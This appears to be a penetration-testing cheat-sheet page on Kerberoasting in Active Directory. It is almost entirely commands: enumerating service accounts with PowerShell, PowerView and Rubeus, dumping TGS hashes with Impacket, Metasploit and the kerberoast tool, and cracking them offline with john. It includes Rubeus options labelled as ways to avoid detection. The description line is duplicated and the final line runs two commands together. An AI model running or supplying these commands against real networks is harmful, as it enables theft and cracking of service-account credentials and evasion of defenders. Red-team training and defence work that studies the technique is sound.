Kerberoast
Compromise Domain User, request TGS for service account. TGS is encrypted with hashed version of account's password. Offline cracking of service account passwords.
Last updated
Compromise Domain User, request TGS for service account. TGS is encrypted with hashed version of account's password. Offline cracking of service account passwords.
Last updated
# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# PowerView
Get-DomainUser -SPN
# Rubeus
.\Rubeus.exe kerberoast /stats
### Linux
# Metasploit framework
msf> use auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
Rubeus.exe kerberoast /user:svcadmin /simple
# To avoid detection, only request RC4 supported SPN
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
# Kerberoast all possible accounts (Bad Opsec)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txtjohn.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt